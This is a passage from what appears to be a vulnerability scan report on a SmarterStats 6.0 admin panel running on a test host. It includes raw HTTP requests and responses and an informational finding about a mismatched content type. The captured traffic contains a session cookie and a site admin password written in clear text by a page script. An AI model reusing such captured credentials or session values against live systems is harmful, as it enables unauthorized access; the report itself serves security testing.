                       <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_4" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$4" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_4">Google (AU)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_12" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$12" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_12">Google (IN)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_19" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$19" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_19">Google (TW)</label></td>
                   </tr><tr>
                       <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_5" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$5" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_5">Google (BR)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_13" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$13" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_13">Google (IL)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_20" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$20" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_20">Google (RU)</label></td>
                   </tr><tr>
                       <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_6" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$6" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_6">Google (CA)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_14" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$14" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_14">Google (IT)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_21" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$21" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_21">Google (UK)</label></td>
                   </tr><tr>
                       <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_7" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$7" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_7">Google (CN)</label></td><td></td><td></td>
                   </tr>
               </table></td>
           </tr>
       </table>

               </span></div>
   
               <div id='ctl00_MPH_LogStatusTab' class='' style='display:none'>
       <span id="ctl00_MPH_LogStatusTab">
                   
<div class="HyperGridWrapper" id="ctl00_MPH_grdLogStatus">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_grdLogStatus_Table">
<thead>
<tr><th scope="col" class="lc al" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$grdLogStatus','sort=FileName')">Filename</a></th><th scope="col" class="ac nw leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$grdLogStatus','sort=LastTimeStamp')">Last Time Stamp<img src='/App_Themes/Default/Images/Misc/down.gif' /></a></th><th scope="col" class="ac nw leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$grdLogStatus','sort=RowsProcessed')">Good Rows</a></th><th scope="col" class="rc ac nw leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$grdLogStatus','sort=RowsSkipped')">Bad Rows</a></th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="lc al">u_ex101011.log</td><td class="ac nw leftpad">10/11/2010</td><td class="ac nw leftpad">5,328</td><td class="rc ac nw leftpad">-</td></tr>
<tr class="alt"><td class="lc al">u_ex101010.log</td><td class="ac nw leftpad">10/10/2010</td><td class="ac nw leftpad">6,738</td><td class="rc ac nw leftpad">-</td></tr>
<tr><td class="lc al">u_ex101009.log</td><td class="ac nw leftpad">10/9/2010</td><td class="ac nw leftpad">9,576</td><td class="rc ac nw leftpad">-</td></tr>
<tr class="alt"><td class="lc al">u_ex101008.log</td><td class="ac nw leftpad">10/8/2010</td><td class="ac nw leftpad">4,358</td><td class="rc ac nw leftpad">-</td></tr>
<tr><td class="lc al">u_ex101007.log</td><td class="ac nw leftpad">10/7/2010</td><td class="ac nw leftpad">1,865</td><td class="rc ac nw leftpad">-</td></tr>
<tr class="alt"><td class="lc al">u_ex101006.log</td><td class="ac nw leftpad">10/6/2010</td><td class="ac nw leftpad">1,897</td><td class="rc ac nw leftpad">-</td></tr>
<tr><td class="lc al">u_ex101005.log</td><td class="ac nw leftpad">10/5/2010</td><td class="ac nw leftpad">2,366</td><td class="rc ac nw leftpad">-</td></tr>
<tr class="alt"><td class="lc al">u_ex101004.log</td><td class="ac nw leftpad">10/4/2010</td><td class="ac nw leftpad">96,077</td><td class="rc ac nw leftpad">-</td></tr>
<tr><td class="lc al">u_ex101003.log</td><td class="ac nw leftpad">10/3/2010</td><td class="ac nw leftpad">3,687</td><td class="rc ac nw leftpad">-</td></tr>
<tr class="alt"><td class="lc al">u_ex101002.log</td><td class="ac nw leftpad">10/2/2010</td><td class="ac nw leftpad">2,382</td><td class="rc ac nw leftpad">-</td></tr>
<tr><td class="lc al">u_ex101001.log</td><td class="ac nw leftpad">10/1/2010</td><td class="ac nw leftpad">2,496</td><td class="rc ac nw leftpad">-</td></tr>
<tr class="alt"><td class="lc al">u_ex100930.log</td><td class="ac nw leftpad">9/30/2010</td><td class="ac nw leftpad">2,079</td><td class="rc ac nw leftpad">-</td></tr>
<tr><td class="lc al">u_ex100929.log</td><td class="ac nw leftpad">9/29/2010</td><td class="ac nw leftpad">2,202</td><td class="rc ac nw leftpad">-</td></tr>
<tr class="alt"><td class="lc al">u_ex100928.log</td><td class="ac nw leftpad">9/28/2010</td><td class="ac nw leftpad">2,432</td><td class="rc ac nw leftpad">-</td></tr>
<tr><td class="lc al">u_ex100927.log</td><td class="ac nw leftpad">9/27/2010</td><td class="ac nw leftpad">2,744</td><td class="rc ac nw leftpad">-</td></tr>
<tr class="alt"><td class="lc al">u_ex100926.log</td><td class="ac nw leftpad">9/26/2010</td><td class="ac nw leftpad">1,932</td><td class="rc ac nw leftpad">-</td></tr>
<tr><td class="lc al">u_ex100925.log</td><td class="ac nw leftpad">9/25/2010</td><td class="ac nw leftpad">1,996</td><td class="rc ac nw leftpad">-</td></tr>
<tr class="alt"><td class="lc al">u_ex100924.log</td><td class="ac nw leftpad">9/24/2010</td><td class="ac nw leftpad">3,417</td><td class="rc ac nw leftpad">-</td></tr>
<tr><td class="lc al">u_ex100923.log</td><td class="ac nw leftpad">9/23/2010</td><td class="ac nw leftpad">2,624</td><td class="rc ac nw leftpad">-</td></tr>
<tr class="alt"><td class="lc al">u_ex100922.log</td><td class="ac nw leftpad">9/22/2010</td><td class="ac nw leftpad">21,591</td><td class="rc ac nw leftpad">-</td></tr>
<tr><td class="lc al">u_ex100921.log</td><td class="ac nw leftpad">9/21/2010</td><td class="ac nw leftpad">79,497</td><td class="rc ac nw leftpad">-</td></tr>
<tr class="alt"><td class="lc al">u_ex100920.log</td><td class="ac nw leftpad">9/20/2010</td><td class="ac nw leftpad">3,211</td><td class="rc ac nw leftpad">-</td></tr>
<tr><td class="lc al">u_ex100920.log</td><td class="ac nw leftpad">9/20/2010</td><td class="ac nw leftpad">2,327</td><td class="rc ac nw leftpad">-</td></tr>
<tr class="alt"><td class="lc al">u_ex100920.log</td><td class="ac nw leftpad">9/20/2010</td><td class="ac nw leftpad">296</td><td class="rc ac nw leftpad">-</td></tr>
<tr class="lastrow"><td class="lc al">u_ex100919.log</td><td class="ac nw leftpad">9/19/2010</td><td class="ac nw leftpad">3,361</td><td class="rc ac nw leftpad">-</td></tr>
</tbody>
</table>
<input type="hidden" name="ctl00_MPH_grdLogStatus_HiddenInput" id="ctl00_MPH_grdLogStatus_HiddenInput" value="" /><input type="hidden" name="ctl00_MPH_grdLogStatus_HiddenLSR" id="ctl00_MPH_grdLogStatus_HiddenLSR" value="" />
</div>
</div>

               </span></div>
   
               <div id='ctl00_MPH_SEOStatusTab' class='' style='display:none'>
       <span id="ctl00_MPH_SEOStatusTab">
                   
<div class="HyperGridWrapper" id="ctl00_MPH_grdSeoStatus">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_grdSeoStatus_Table"><tr><td class="NoItems" colspan="4">There are no items to show in this list</td></tr>
</table>
<input type="hidden" name="ctl00_MPH_grdSeoStatus_HiddenInput" id="ctl00_MPH_grdSeoStatus_HiddenInput" value="" /><input type="hidden" name="ctl00_MPH_grdSeoStatus_HiddenLSR" id="ctl00_MPH_grdSeoStatus_HiddenLSR" value="" />
</div>
</div>

               </span></div>
   
           </div>

       |0|hiddenField|__EVENTTARGET||0|hiddenField|__EVENTARGUMENT||0|hiddenField|__LASTFOCUS||26168|hiddenField|__VIEWSTATE|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|126|asyncPostBackControlIDs||ctl00$BPH$btnSave,,ctl00$BPH$btnEdit,,ctl00$MPH$btnRefresh,,ctl00$BPH$mnu1,,ctl00$MPH$btnUpdateIISImport,,ctl00$BPH$btnDelete,|0|postBackControlIDs|||95|updatePanelIDs||tctl00$UpdatePanel1,,tctl00$TPH$UpdatePanel1,,tctl00$MPH$UpdatePanel5,,tctl00$MPH$UpdatePanel3,|22|childUpdatePanelIDs||ctl00$MPH$UpdatePanel3|67|panelsToRefreshIDs||ctl00$UpdatePanel1,,ctl00$TPH$UpdatePanel1,,ctl00$MPH$UpdatePanel5,|2|asyncPostBackTimeout||90|32|formAction||frmSite.aspx?SiteId=1&popup=true|20|pageTitle||Sites - SmarterStats|224|scriptBlock|ScriptPath|/ScriptResource.axd?d=pVn15ziXvQY5aBffxiDTK6PUkVd1wbLwZ8qHXgDTDQU-gDmeOQZCbCnf3LN8cb6wKZJNHgRyjasDbTS9TuTZ7GXz6UL6zabFuTHuGM9izuBi-gzcVhEZX9Fg6cQx4oJc6iXtzA8ahWISPmTnWBlMNk0W7V9Kl_5HxQNbPSm8qmJcO3ou2wT9aun3Nb592DHA0&t=26c081|198|scriptStartupBlock|ScriptContentNoTags|
function ShowContextMenu_ctl00_MPH_ctl02(evt) {
   $('#ctl00_MPH_ctl02').showHyperContextMenu(evt);
   evt.cancelBubble = true;
   if (evt.stopPropagation) evt.stopPropagation();
   return false;
}
|21|scriptStartupBlock|ScriptContentNoTags|DoPopupWindowClose();|51|scriptStartupBlock|ScriptContentNoTags|if (document.ResizeEvent) document.ResizeEvent();
|65|scriptStartupBlock|ScriptContentNoTags|$('#ctl00_MPH_txtAdminNewPassword_SettingText').val('LL12345');
|944|scriptStartupBlock|ScriptContentNoTags|var ctl00_MPH_grdLogLocations_Url6893 = new Array();
ctl00_MPH_grdLogLocations_Url6893[0] = '\x2fAdmin\x2fPopups\x2ffrmLogLocation\x2easpx\x3flguid\x3d987e66443e514990a8afcfb456a232c0\x26UniqueID\x3d6706b61d8fb8408db0bd7daf9956e3ec';
var ctl00_MPH_grdLogLocations;
function DelayedSetupctl00_MPH_grdLogLocations() {
   ctl00_MPH_grdLogLocations = new HyperGrid('ctl00_MPH_grdLogLocations', true, '', 'Url6893', '', null, 0, ShowContextMenu_ctl00_MPH_ctl02, DoubleClick, null, false, 2, '\x7b0\x7d\x20selected\x20items',false, '', {});
   ctl00_MPH_grdLogLocations.AddUrlColumn('Url6893',ctl00_MPH_grdLogLocations_Url6893);
   ctl00_MPH_grdLogLocations.AutoSelect();
   ctl00_MPH_grdLogLocations.Focus();
}
if (self.ctl00_MPH_grdLogLocationsHGIsCallback)
   DelayedSetupctl00_MPH_grdLogLocations();
else
   HGAddLoadEvent(function(){setTimeout(DelayedSetupctl00_MPH_grdLogLocations, 100);});
self.ctl00_MPH_grdLogLocationsHGIsCallback = true;
|328|scriptStartupBlock|ScriptContentNoTags|

























function DelayedSetupctl00_MPH_grdLogStatus() { }
if (self.ctl00_MPH_grdLogStatusHGIsCallback)
   DelayedSetupctl00_MPH_grdLogStatus();
else
   HGAddLoadEvent(function(){setTimeout(DelayedSetupctl00_MPH_grdLogStatus, 100);});
self.ctl00_MPH_grdLogStatusHGIsCallback = true;
|278|scriptStartupBlock|ScriptContentNoTags|
function DelayedSetupctl00_MPH_grdSeoStatus() { }
if (self.ctl00_MPH_grdSeoStatusHGIsCallback)
   DelayedSetupctl00_MPH_grdSeoStatus();
else
   HGAddLoadEvent(function(){setTimeout(DelayedSetupctl00_MPH_grdSeoStatus, 100);});
self.ctl00_MPH_grdSeoStatusHGIsCallback = true;
|648|scriptStartupBlock|ScriptContentNoTags|$(function() { $('#ctl00_TPH_HyperTabStrip1').hyperTabStrip({"MultiPageClientID":"ctl00_MPH_MP1","FunctionMap":{},"PageViewMap":{"ctl00_TPH_HyperTabStrip1_HyperTabItem1":"ctl00_MPH_OptionsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem2":"ctl00_MPH_LogOptionsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem3":"ctl00_MPH_LogLocationsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem4":"ctl00_MPH_LogFTPTab","ctl00_TPH_HyperTabStrip1_HyperTabItem5":"ctl00_MPH_SeoOptionsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem7":"ctl00_MPH_LogStatusTab","ctl00_TPH_HyperTabStrip1_HyperTabItem8":"ctl00_MPH_SEOStatusTab"},"ClientCallbacks":{"onTabChanged":"TabChanged"}}); });
|83|scriptStartupBlock|ScriptContentNoTags|Sys.Application.add_init(function() {if (self.valSwitchTab) self.valSwitchTab();});|27|scriptStartupBlock|ScriptContentNoTags|modules['isPostBack']=true;|48|scriptStartupBlock|ScriptContentNoTags|modules['vmNotBlank_txt']='Must have a value';
|141|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Site Name","vcID":"ctl00_MPH_txtDomainName_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
|48|scriptStartupBlock|ScriptContentNoTags|modules['vmOptional_txt']='Value is optional';
|140|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Site Url","vcID":"ctl00_MPH_txtDomainUrl_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
|157|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Site Admin Username","vcID":"ctl00_MPH_txtAdminNewUserName_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
|157|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Site Admin Password","vcID":"ctl00_MPH_txtAdminNewPassword_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
|152|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Export Url","vcID":"ctl00_MPH_txtLogFileExportLocURL_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
|171|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Default Documents (one per line)","vcID":"ctl00_MPH_txtDefaultDocuments_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
|573|scriptStartupBlock|ScriptContentNoTags|$(function() { $('#ctl00_MPH_ctl02').hyperMenu({"ClearFloat":false,"IsContextMenu":true,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_MPH_ctl02_hm0":"__doPostBack(\u0027ctl00$BPH$mnu1\u0027,\u0027ctl00_BPH_mnu1_btnAdd\u0027)","ctl00_MPH_ctl02_hm0_hm0":"__doPostBack(\u0027ctl00$BPH$mnu1\u0027,\u0027ctl00_BPH_mnu1_btnAdd_btnAddLogLocation\u0027)","ctl00_MPH_ctl02_hm1":"__doPostBack(\u0027ctl00$BPH$btnEdit\u0027,\u0027\u0027)","ctl00_MPH_ctl02_hm2":"DoDeleteQuery_ctl00_BPH_btnDelete();"},"ClientCallbacks":{}}); });
|45|scriptStartupBlock|ScriptContentNoTags|modules['vmNumber_txt']='Must be a number';
|58|scriptStartupBlock|ScriptContentNoTags|modules['vmNumberGreater_txt']='Must be {0} or greater';
|202|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Max Keywords","vcID":"ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
|208|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Max Competitors","vcID":"ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
|213|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Max Position to Retrieve","vcID":"ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
|

10.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSites.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain HTML.

Request

POST /Admin/frmSites.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"1647212677","TopBarSection":"AdminManage"}
Content-Length: 912

ctl00%24ScriptManager1=ctl00%24BPH%24UpdatePanel4%7Cctl00%24BPH%24btnRefresh&__EVENTTARGET=ctl00%24BPH%24btnRefresh&__EVENTARGUMENT=&__VIEWSTATE=%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%2FU%3D&ctl00%24BrPH%24searchBar%24FilterBox=Search...&ctl00%24SPH%24txtSearchString=&ctl00_MPH_HyperGrid1_CB64_MQ--=on&ctl00_MPH_HyperGrid1_HiddenInput=&ctl00_MPH_HyperGrid1_HiddenLSR=0&__ASYNCPOST=true&

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:37:17 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 11024

1|#||4|2392|updatePanel|ctl00_BPH_UpdatePanel4|
           <div id="ctl00_BPH_btnNew" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OpenNewMessage('frmSite.aspx',800,600);; return false;"><span class="BBInner">New</span></a></div>
           <div id="ctl00_BPH_btnEdit" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_btnEdit(); return false;"><span class="BBInner">Edit</span></a></div>
           <div id="ctl00_BPH_btnDelete" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnDelete',''); return false;"><span class="BBInner">Delete</span></a></div>
           
<!-- HyperMenu -->
<div class='hmMenuBar'><ul class='hmMenu hmMenuBar hmList' id='ctl00_BPH_menuAction' name='ctl00$BPH$menuAction' style='z-index:800'>
   <li class='hmItem hmFirst' id='ctl00_BPH_menuAction_btnViewStats' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>View Site<span class='hmArrow'></span></a>
   <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
       <li class='hmItem hmFirst' id='ctl00_BPH_menuAction_btnViewStats_btnImpersonateAdmin' style='z-index: 800'><a class='hmA' href='#'>As Site Admin</a></li>
       <li class='hmItem hmLast' id='ctl00_BPH_menuAction_btnViewStats_btnImpersonateUser' style='z-index: 800'><a class='hmA' href='#'>As User</a></li>
   </ul><div class='hmScrollDown'></div></div>
   </li>
   <li class='hmItem hmLast' id='ctl00_BPH_menuAction_menuActionRoot' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>Actions<span class='hmArrow'></span></a>
   <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
       <li class='hmItem hmFirst' id='ctl00_BPH_menuAction_menuActionRoot_hm0' style='z-index: 800'><a class='hmA' href='#'>Run Diagnostics</a></li>
       <li class='hmItem' id='ctl00_BPH_menuAction_menuActionRoot_hm1' style='z-index: 800'><a class='hmA' href='#'>Reprocess Site</a></li>
       <li class='hmItem hmLast' id='ctl00_BPH_menuAction_menuActionRoot_hm2' style='z-index: 800'><a class='hmA' href='#'>Re-import Site</a></li>
   </ul><div class='hmScrollDown'></div></div>
   </li>
</ul>
</div>

           <div id="ctl00_BPH_btnRefresh" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnRefresh',''); return false;"><span class="BBInner">Refresh</span></a></div>
       |932|updatePanel|ctl00_BrPH_UpdatePanel5|
           
<div id="FilterBarContents" class="RoundedSearchBox">
   <div class="RoundedSearchBoxLeft">
       <div class="RoundedSearchBoxRight">
           <label for="ctl00_BrPH_searchBar_FilterBox" id="ctl00_BrPH_searchBar_FilterBoxLabel" style="display: none">Search...</label>
           <div id="ctl00_BrPH_searchBar_btnGo" class="BBButton GoButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BrPH$searchBar$btnGo',''); return false;"><span class="BBInner"></span></a></div>
           <input name="ctl00$BrPH$searchBar$FilterBox" type="text" value="Search..." id="ctl00_BrPH_searchBar_FilterBox" autocomplete="off" />
           <div id="ctl00_BrPH_searchBar_btnClear" class="BBButton ClearButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BrPH$searchBar$btnClear',''); return false;"><span class="BBInner"></span></a></div>
       </div>
   </div>
</div>


       |11|updatePanel|ctl00_UpdatePanel1|
               
           |2305|updatePanel|ctl00_MPH_UpdatePanel1|
           
<div class="HyperGridWrapper" id="ctl00_MPH_HyperGrid1">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_HyperGrid1_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_HyperGrid1CheckAll" name="ctl00$MPH$HyperGrid1CheckAll" /></th><th scope="col" class="ac SmallImage" style="overflow: hidden">&nbsp;</th><th scope="col" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=name')">Site Name</a></th><th scope="col" class="ac nw leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=siteid')">Site ID</a></th><th scope="col" class="ac leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=servername')">Server Name</a></th><th scope="col" class="ac leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=currentstate')">Current State</a></th><th scope="col" class="ac leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=currently')">Activity</a></th><th scope="col" class="rc ac leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=status')">Status</a></th></tr>
</thead>
<tbody>
<tr class="firstrow selected"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MQ--" name="ctl00_MPH_HyperGrid1_CB64_MQ--" checked='checked' /></td><td class="ac SmallImage"><img src="/App_Themes/Default/Images/16x16/openstatus.gif" align="absmiddle" /></td><td>vilnerable.smarterstats.6.0.host</td><td class="ac nw leftpad">1</td><td class="ac leftpad">localhost</td><td class="ac leftpad">Running</td><td class="ac leftpad"><span id="spnCurrently1">Loading...</span></td><td class="rc ac leftpad"><span id="spnCurrentState1">Loading...</span></td></tr>
</tbody>
</table>
<input type="hidden" name="ctl00_MPH_HyperGrid1_HiddenInput" id="ctl00_MPH_HyperGrid1_HiddenInput" value="" /><input type="hidden" name="ctl00_MPH_HyperGrid1_HiddenLSR" id="ctl00_MPH_HyperGrid1_HiddenLSR" value="" />
</div>
</div>

       |412|updatePanel|ctl00_NavPH_UpdatePanel2|
           
<span class="HyperPagerWrapper" id="ctl00_NavPH_HyperPager1">
<span class="HyperPager">
<span class="hpGroup">First</span>
<span class="hpGroup">&lt;&lt;</span>
<span class="hpGroup">&lt;</span>
<span class="hpPageCurrent">1</span>
<span class="hpPage">of 1</span>
<span class="hpGroup">&gt;</span>
<span class="hpGroup">&gt;&gt;</span>
<span class="hpGroup">Last</span>
</span>
</span>


       |63|updatePanel|ctl00_CntPH_UpdatePanel3|
           <span id="ctl00_CntPH_lblSiteCounter">1 site(s)</span>
       |0|hiddenField|__EVENTTARGET||0|hiddenField|__EVENTARGUMENT||564|hiddenField|__VIEWSTATE|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|42|asyncPostBackControlIDs||ctl00$BPH$btnDelete,,ctl00$BPH$btnRefresh,|0|postBackControlIDs|||150|updatePanelIDs||tctl00$BPH$UpdatePanel4,,tctl00$BrPH$UpdatePanel5,,tctl00$UpdatePanel1,,tctl00$MPH$UpdatePanel1,,tctl00$NavPH$UpdatePanel2,,tctl00$CntPH$UpdatePanel3,|0|childUpdatePanelIDs|||144|panelsToRefreshIDs||ctl00$BPH$UpdatePanel4,,ctl00$BrPH$UpdatePanel5,,ctl00$UpdatePanel1,,ctl00$MPH$UpdatePanel1,,ctl00$NavPH$UpdatePanel2,,ctl00$CntPH$UpdatePanel3,|2|asyncPostBackTimeout||90|13|formAction||frmSites.aspx|20|pageTitle||Sites - SmarterStats|224|scriptBlock|ScriptPath|/ScriptResource.axd?d=pVn15ziXvQY5aBffxiDTK6PUkVd1wbLwZ8qHXgDTDQU-gDmeOQZCbCnf3LN8cb6wKZJNHgRyjasDbTS9TuTZ7GXz6UL6zabFuTHuGM9izuBi-gzcVhEZX9Fg6cQx4oJc6iXtzA8ahWISPmTnWBlMNk0W7V9Kl_5HxQNbPSm8qmJcO3ou2wT9aun3Nb592DHA0&t=26c081|724|scriptBlock|ScriptContentWithTags|{"text":"\r\n var startup = function() {\r\n $(\"#FilterBarContents\").magicLabels();\r\n\r\n $(\"#ctl00_BrPH_searchBar_FilterBox\").keypress(function(event) {\r\n if (event.keyCode == 13) {\r\n __doPostBack(\u0027ctl00$BrPH$searchBar$btnGo\u0027,\u0027\u0027);\r\n event.preventDefault();\r\n }\r\n });\r\n\r\n $(\"#ctl00_BrPH_searchBar_btnClear\").click(function() {\r\n $(\"#ctl00_BrPH_searchBar_FilterBox\").val(\u0027\u0027);\r\n $(\"#FilterBarContents\").magicLabels();\r\n });\r\n }\r\n setTimeout(startup, 1);\r\n\t","type":"text/javascript"}|198|scriptStartupBlock|ScriptContentNoTags|
function ShowContextMenu_ctl00_MPH_ctl01(evt) {
   $('#ctl00_MPH_ctl01').showHyperContextMenu(evt);
   evt.cancelBubble = true;
   if (evt.stopPropagation) evt.stopPropagation();
   return false;
}
|22|scriptStartupBlock|ScriptContentNoTags|SiteInfoCallback([1]);|51|scriptStartupBlock|ScriptContentNoTags|if (document.ResizeEvent) document.ResizeEvent();
|37|scriptStartupBlock|ScriptContentNoTags|document.onkeypress = DetectSearch;
|725|scriptStartupBlock|ScriptContentNoTags|var ctl00_MPH_HyperGrid1_Url14 = new Array();
ctl00_MPH_HyperGrid1_Url14[0] = 'frmSite\x2easpx\x3fSiteId\x3d1';
var ctl00_MPH_HyperGrid1;
function DelayedSetupctl00_MPH_HyperGrid1() {
   ctl00_MPH_HyperGrid1 = new HyperGrid('ctl00_MPH_HyperGrid1', true, '', 'Url14', '', null, -1, ShowContextMenu_ctl00_MPH_ctl01, OpenSite, null, false, 2, '\x7b0\x7d\x20selected\x20items',false, '', {});
